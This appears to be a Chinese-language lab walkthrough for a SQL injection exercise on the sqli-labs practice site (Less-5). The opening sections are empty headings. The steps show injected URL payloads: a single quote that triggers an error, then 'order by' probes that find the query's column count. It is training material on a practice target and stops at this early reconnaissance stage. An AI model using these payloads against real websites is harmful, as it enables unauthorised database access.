一、预备知识
二、实验目的
三、实验工具
浏览器
四、实验环境
客户机一台
五、实验步骤
第一步:访问
http://www.any.com/sqli/Less-5/?id=1 #页面正常
第二步:加入单引号,访问
http://www.any.com/sqli/Less-5/?id=1' #会报错
第三步:判断列数。(通过二分法)
1)输入:
http://www.any.com/sqli/Less-5/?id=1' order by 3 %23
页面正常,说明大于等于3列。
2)输入:
http://www.any.com/sqli/Less-5/?id=1' order by 4 %23
提示 Unknown column '4' in 'order clause'
,说明小于4列,结合上面的可以确定有3列。